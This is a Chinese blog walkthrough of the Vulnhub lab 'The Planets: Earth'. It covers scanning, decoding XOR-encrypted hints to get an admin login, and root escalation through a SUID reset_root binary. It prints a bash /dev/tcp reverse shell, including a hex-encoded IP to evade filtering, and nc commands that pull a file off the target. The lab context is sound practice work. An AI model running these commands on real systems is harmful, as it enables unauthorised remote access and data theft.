IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> The Planets: Earth-Vulnhub靶场 -> 正文阅读

[系统运维]The Planets: Earth-Vulnhub靶场

下载靶机:下载地址
下载后直接在vm打开,把靶机和kali网络配置成NAT模式。
开启靶机,查看MAC地址。
在这里插入图片描述
打开kali使用命令arp-scan -l查看靶机ip:192.168.195.132
在这里插入图片描述

nmap -A 192.168.195.132

查看开放的端口,能看到打开了80和443端口,443端口还有两个DNS地址
在这里插入图片描述
尝试查看ip页面,发现什么也没有,这里需要把两条DNS地址写到hosts文件里
需要用到命令vim /etc/hosts进入后点i开始编辑,添加完成后点esc退出,最后输入:wq保存并退出
在这里插入图片描述
cat /etc/hosts查看编辑后的host
访问https://earth.local与https://terratest.earth.local
在https://earth.local最下面发现了三段加密信息
在这里插入图片描述
另外一个没有发现什么有用的信息。

dirb https://earth.local/
dirb https://terratest.earth.local/

扫描两个站点目录
在这里插入图片描述
访问https://earth.local/admin/login 是一个登录地址
在这里插入图片描述
访问https://terratest.earth.local/robots.txt 发现一个比较特别的
Disallow: /testingnotes.* 尝试后发现是一个testingnotes.txt,查看得到相应提示
在这里插入图片描述
翻译一下
在这里插入图片描述
得到一些信息,三段信息可能使用的是XOR算法进行的加密,曾经发送过信息,存在一个txt的测试加密,可以通过这个txt获得加密方式,用户名是terra,密码目前未知。访问testdata.txt
在这里插入图片描述

使用网站https://gchq.github.io/CyberChef/ 可以解出3段密码
也可以写脚本,这里我用的是网站:先将previous message从16进制数转化为UTF-8,再与message进行XOR运算,message就是testdata.txt的内容,XOR运算也使用UTF-8编码
把testdata.txt的内容写到XOR的key中,第三段解出了需要的东西,查看发现是重复的内容,可能是登陆密码
在这里插入图片描述
尝试登录
在这里插入图片描述
尝试输入一些命令ls,发现可以执行,尝试反弹shell

bash -i >& /dev/tcp/192.168.195.128/1234 0>&1  

发现不能用,上网搜索后知道了这里要把ip进行16进制编码

bash -i >& /dev/tcp/0xc0.0xa8.0xc3.0x80/1234 0>&1    

在这里插入图片描述
使用find命令查找一下flag

find / -name "*flag.txt"

在这里插入图片描述
查看可以得到user_flag
现在只有网站权限,尝试提权到root先看下suid有些什么信息,看到这个命令

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述
使用这个命令,看到一条信息:大概意思是修改root密码为Earth
在这里插入图片描述
尝试执行reset_root提示触发器不存在,

在这里插入图片描述
由于靶机没有ltrace,所以将/usr/bin/reset_root传到本地分析

kali攻击机监听2222端口,并将接收到的内容重定向到文件reset_root

nc -lvvp 2222 > reset_root

靶机上将/usr/bin/reset_root文件的内容通过nc重定向到攻击机的2222端口

nc 192.168.124.129 2222 < /usr/bin/reset_root

在这里插入图片描述
可以看出会检查触发器是否存在为条件,这里就是/dev/shm/kHgTFI5G、/dev/shm/Zw7bV9U5、/tmp/kcM0Wewe这3个文件夹都需要存在

那么在靶机上创建这三个文件夹,再执行reset_root,成功重置root密码为Earth
在这里插入图片描述
这里可以登录拿到flag
在这里插入图片描述

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-10-08 21:17:28  更:2022-10-08 21:19:39 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 6:12:14-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码